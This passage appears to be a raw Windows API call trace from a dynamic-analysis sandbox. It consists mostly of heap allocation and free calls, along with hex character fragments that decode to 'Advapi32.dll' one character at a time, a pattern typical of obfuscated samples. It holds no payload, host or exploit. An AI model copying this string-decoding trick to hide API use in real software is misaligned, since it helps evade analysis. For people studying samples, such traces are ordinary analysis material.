Flags=0x0, Size=0x10) returned 0x29ecb08 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbf8 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72878 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbe0 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72928 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72828 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eca18 [0084.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72828 | out: hHeap=0x2af0000) returned 1 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a727b8 [0084.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727b8 | out: hHeap=0x2af0000) returned 1 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecda8 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72918 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72918 | out: hHeap=0x2af0000) returned 1 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecfb8 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72938 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd00 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eca18 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecda8 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72928 | out: hHeap=0x2af0000) returned 1 [0084.212] lstrlenW (lpString="41") returned 2 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecfb8 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72938 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd00 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbe0 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72878 | out: hHeap=0x2af0000) returned 1 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72938 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726d8 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72938 | out: hHeap=0x2af0000) returned 1 [0084.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.212] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.212] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72808 [0084.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eca18 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb08 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728b8 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72968 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbe0 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbf8 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a727e8 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727e8 | out: hHeap=0x2af0000) returned 1 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72898 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72898 | out: hHeap=0x2af0000) returned 1 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecfb8 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a727f8 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727f8 | out: hHeap=0x2af0000) returned 1 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd00 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72978 [0084.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd48 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecfb8 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbe0 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72968 | out: hHeap=0x2af0000) returned 1 [0084.213] lstrlenW (lpString="64") returned 2 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd00 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72978 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd48 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728b8 | out: hHeap=0x2af0000) returned 1 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72818 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eca18 | out: hHeap=0x2af0000) returned 1 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72808 | out: hHeap=0x2af0000) returned 1 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72818 | out: hHeap=0x2af0000) returned 1 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.214] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.214] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728b8 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbe0 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb08 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728d8 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72928 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbf8 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72838 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eca18 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72838 | out: hHeap=0x2af0000) returned 1 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728c8 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728c8 | out: hHeap=0x2af0000) returned 1 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecfb8 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72898 [0084.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72898 | out: hHeap=0x2af0000) returned 1 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd00 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72898 [0084.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ece98 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eca18 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecfb8 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72928 | out: hHeap=0x2af0000) returned 1 [0084.215] lstrlenW (lpString="76") returned 2 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd00 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72898 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ece98 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728d8 | out: hHeap=0x2af0000) returned 1 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eca18 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72998 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbe0 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728b8 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72998 | out: hHeap=0x2af0000) returned 1 [0084.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eca18 | out: hHeap=0x2af0000) returned 1 [0084.215] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.215] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72818 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbf8 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eca18 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72808 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb08 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72838 [0084.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbe0 [0084.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728e8 [0084.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc28 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728e8 | out: hHeap=0x2af0000) returned 1 [0084.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727c8 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72918 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbe0 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ece98 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72838 | out: hHeap=0x2af0000) returned 1 [0084.216] lstrlenW (lpString="61") returned 2 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd00 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728b8 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecfb8 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72808 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eca18 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72818 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727f8 | out: hHeap=0x2af0000) returned 1 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.216] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.216] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72898 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727a8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72918 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd48 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbe0 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728a8 | out: hHeap=0x2af0000) returned 1 [0084.217] lstrlenW (lpString="70") returned 2 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecfb8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727e8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ece98 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eca18 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72988 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72998 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eca18 | out: hHeap=0x2af0000) returned 1 [0084.217] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.217] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727d8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727f8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728b8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecfb8 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: hHeap=0x2af0000) returned 1 [0084.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72858 | out: hHeap=0x2af0000) returned 1 [0084.217] lstrlenW (lpString="69") returned 2 [0084.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd00 | out: hHeap=0x2af0000) returned 1 [0084.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72928 | out: hHeap=0x2af0000) returned 1 [0084.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd48 | out: hHeap=0x2af0000) returned 1 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] lstrlenW (lpString="33") returned 2 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] lstrlenW (lpString="32") returned 2 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] lstrlenW (lpString="2E") returned 2 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] lstrlenW (lpString="64") returned 2 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.218] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.223] lstrlenW (lpString="6C") returned 2 [0084.223] lstrlenW (lpString="6C") returned 2 [0084.223] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.223] lstrlenW (lpString="20") returned 2 [0084.223] lstrlenW (lpString="31") returned 2 [0084.224] lstrlenW (lpString="20") returned 2 [0084.224] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.224] lstrlenW (lpString="20") returned 2 [0084.225] lstrlenW (lpString="30") returned 2 [0084.225] lstrlenW (lpString="20") returned 2 [0084.225] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.225] lstrlenW (lpString="20") returned 2 [0084.226] lstrlenW (lpString="40") returned 2 [0084.226] lstrlenW (lpString="4F") returned 2 [0084.226] lstrlenW (lpString="53") returned 2 [0084.226] 